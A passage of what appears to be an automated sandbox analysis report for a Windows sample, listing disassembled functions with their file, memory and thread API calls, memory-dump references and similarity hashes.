                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1936579350-0
                                                                                                        • Opcode ID: 28db9cfd60cb3fb0a98a5434b63424f1a9b1fdf2608077bf16c4e34c875029e8
                                                                                                        • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                                                                        • Opcode Fuzzy Hash: 28db9cfd60cb3fb0a98a5434b63424f1a9b1fdf2608077bf16c4e34c875029e8
                                                                                                        • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1936579350-0
                                                                                                        • Opcode ID: cb066a32d6fc84c7f2b6a08c951bf6048ceb161d563f20fdbabff66222ef7d09
                                                                                                        • Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
                                                                                                        • Opcode Fuzzy Hash: cb066a32d6fc84c7f2b6a08c951bf6048ceb161d563f20fdbabff66222ef7d09
                                                                                                        • Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 2976181284-0
                                                                                                        • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                                        • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                                                                        • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                                        • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                                                                        APIs
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                                                        • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocExceptionStringThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3773818493-0
                                                                                                        • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                                        • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                                                                        • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                                        • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                        • String ID:
                                                                                                        • API String ID: 3168844106-0
                                                                                                        • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                                        • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                                                                        • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                                        • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog
                                                                                                        • String ID:
                                                                                                        • API String ID: 3519838083-0
                                                                                                        • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                        • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                                                        • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                        • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                                                        APIs
                                                                                                        • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                        • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                                                        • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                        • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3498533004-0
                                                                                                        • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                        • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                                                                        • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                        • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                                                                        APIs
                                                                                                        • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3934441357-0
                                                                                                        • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                        • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                                                                        • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                        • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                                                                        APIs
                                                                                                        • _beginthreadex.MSVCRT ref: 00406552
                                                                                                          • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_beginthreadex
                                                                                                        • String ID:
                                                                                                        • API String ID: 4034172046-0
                                                                                                        • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                                        • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                                                                                        • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                                        • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog
                                                                                                        • String ID:
                                                                                                        • API String ID: 3519838083-0
                                                                                                        • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                                        • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                                                                        • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                                        • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                                        • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                                                        • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                                        • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                                                        APIs
                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileTime
                                                                                                        • String ID:
                                                                                                        • API String ID: 1425588814-0
                                                                                                        • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                                        • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                                                        • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                                        • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1033339047-0
                                                                                                        • Opcode ID: 22fae346508b387be620676aefe54f5ba332bfd43235a82cb31898e5e1b252f2
                                                                                                        • Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
                                                                                                        • Opcode Fuzzy Hash: 22fae346508b387be620676aefe54f5ba332bfd43235a82cb31898e5e1b252f2
                                                                                                        • Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                                        • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                                                        • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                                        • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1033339047-0
                                                                                                        • Opcode ID: 8c656c2e1a3b1113b906896464f2e87f63fa16c9f402e9948991ae45e955b1b9
                                                                                                        • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                                                        • Opcode Fuzzy Hash: 8c656c2e1a3b1113b906896464f2e87f63fa16c9f402e9948991ae45e955b1b9
                                                                                                        • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                        • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                                                        • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                        • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                        • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                                                        • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                        • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                                                        Memory Dump Source
